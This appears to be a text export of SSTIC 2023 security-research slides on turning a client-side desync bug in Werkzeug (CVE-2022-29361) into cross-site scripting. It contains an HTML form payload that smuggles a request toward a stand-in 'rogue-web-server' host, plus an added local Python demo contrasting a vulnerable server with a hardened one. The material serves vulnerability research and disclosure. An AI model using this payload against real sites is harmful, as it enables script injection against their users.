Abusing Client-Side Desync on Werkzeug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Werkzeug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10486673/pasted-from-clipboard.png)
Kévin GERVOT
1/27
Parsing bug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10534197/2023-06-07-230027_1493x399.png)
What can we do with this kind of bug?
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485588/client_side_desync_01.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485572/client_side_desync_02.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485573/client_side_desync_03.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485575/client_side_desync_04.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485576/client_side_desync_05.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485577/client_side_desync_06.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485578/client_side_desync_07.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485580/client_side_desync_08.png)
Exploiting a CSD
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10486674/pasted-from-clipboard.png)
Can we turn a CSD into an XSS?
Challenges
- No interaction with a remote server
- No control over the files of the vulnerable server
- No additional vulnerabilities
Exploitation idea
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485544/exploit_chain_01.png)
How do we find a redirect in Werkzeug?
CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485044/pasted-from-clipboard_1_.png)
CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483699/open_redirect_01.png)
The fix for CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483735/open_redirect_03.png)
The gadget is still present
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483709/open_redirect_02.png)
Exploitation
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485663/open_redirect_05.png)
How do we set up the exploitation from a client?
text/plain form
```html
<!-- With enctype="text/plain" the browser sends the body as raw `name=value` lines
     (CRLF-terminated, no escaping), so the field name can carry a request line
     and a header; the value only terminates the last header line. -->
<form action="http://vulnerable-website/" method="POST"
      enctype="text/plain">
  <textarea name="GET http://rogue-web-server:5000 HTTP/1.1
Foo: x">Mizu</textarea>
  <button type="submit">START</button>
</form>
```
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483765/putting_all_together_02.png)
text/plain form
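How the body produced by this form desynchronizes a keep-alive connection, as an added example that is not part of the slides and not Werkzeug's code. The toy server below is built on Python's own `http.server` and reproduces only the class of bug behind CVE-2022-29361 (an HTTP/1.1 handler that answers a POST without consuming the body declared by `Content-Length`), next to a hardened variant that drains it; it does not reproduce Werkzeug's actual code path or the redirect gadget from the previous slides. The client encodes the form exactly as `enctype="text/plain"` does, sends it, then sends an ordinary follow-up request on the same connection, as a browser would for its next navigation or script load. The host names, the `/next` path and the `Mizu` value are constructed.

```python
"""Added example (not the slides' or Werkzeug's code): a constructed keep-alive
HTTP/1.1 server that reproduces the bug class behind CVE-2022-29361 (answering a
POST without consuming its body) next to a hardened variant that drains it, and a
client that shows which request line the server processes second."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def _crlf(s):
    # Browsers normalize newlines inside text/plain form entries to CRLF.
    return s.replace("\r\n", "\n").replace("\r", "\n").replace("\n", "\r\n")


def text_plain_form_body(fields):
    """Encode (name, value) pairs as enctype="text/plain" does: one `name=value`
    line per field, CRLF-terminated, with no escaping at all. That missing
    escaping is what lets a field name carry a request line and a header."""
    return b"".join(
        (_crlf(name) + "=" + _crlf(value) + "\r\n").encode() for name, value in fields
    )


def make_handler(consume_body):
    class Handler(BaseHTTPRequestHandler):
        protocol_version = "HTTP/1.1"   # keep-alive connections, as the talk assumes
        seen = []                       # request lines in the order the server parsed them

        def log_message(self, *args):
            pass                        # keep the demo silent

        def _reply(self, body):
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_POST(self):
            Handler.seen.append(self.requestline)
            if consume_body:
                # Hardened: drain exactly Content-Length bytes so the next request
                # on this connection starts where the client thinks it does.
                self.rfile.read(int(self.headers.get("Content-Length", 0)))
            # Vulnerable (deliberate): otherwise the body stays unread in rfile
            # and is parsed as the start of the next request.
            self._reply(b"posted")

        def do_GET(self):
            Handler.seen.append(self.requestline)
            self._reply(b"got " + self.path.encode())

    return Handler


def read_response(f):
    """Minimal HTTP/1.1 response reader: status line, headers, Content-Length body."""
    status = f.readline().decode().rstrip("\r\n")
    headers = {}
    while True:
        line = f.readline()
        if line in (b"\r\n", b"\n", b""):
            break
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, f.read(int(headers.get("content-length", 0)))


def run_probe(consume_body):
    """Return (request lines seen by the server, first response, second response)."""
    Handler = make_handler(consume_body)
    server = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    # Same body the text/plain form on the slide produces (host names are constructed).
    body = text_plain_form_body([("GET http://rogue-web-server:5000 HTTP/1.1\nFoo: x", "Mizu")])
    try:
        with socket.create_connection((host, port), timeout=5) as sock:
            f = sock.makefile("rb")
            sock.sendall(
                b"POST / HTTP/1.1\r\nHost: %s\r\nContent-Type: text/plain\r\n"
                b"Content-Length: %d\r\n\r\n" % (host.encode(), len(body)) + body
            )
            first = read_response(f)
            # The browser's next request on the same connection, e.g. a script load.
            sock.sendall(b"GET /next HTTP/1.1\r\nHost: %s\r\n\r\n" % host.encode())
            second = read_response(f)
    finally:
        server.shutdown()
        server.server_close()
    return list(Handler.seen), first, second


if __name__ == "__main__":
    for consume in (False, True):
        seen, first, second = run_probe(consume)
        print("consume_body=%s seen=%s second=%r" % (consume, seen, second[1]))
```

Run it and compare the two lines it prints. With `consume_body=False` the second request the server handles is the `GET http://rogue-web-server:5000 HTTP/1.1` line that came from the form field name, and the client's own `GET /next` is swallowed as malformed header lines of that smuggled request, so the client receives an answer to a request it never meant to send; with `consume_body=True` the leftover body is drained and `/next` is served. In the slides' chain that smuggled absolute URI is what reaches the Werkzeug redirect gadget the earlier slides look for.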
Exploiting the vulnerability
Fixing the bug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485333/2023-05-19-125641_1086x346.png)
Conclusion
SSTIC 2023 | Abusing Client-Side Desync on Werkzeug | CVE-2022-29361
By Kévin (Mizu)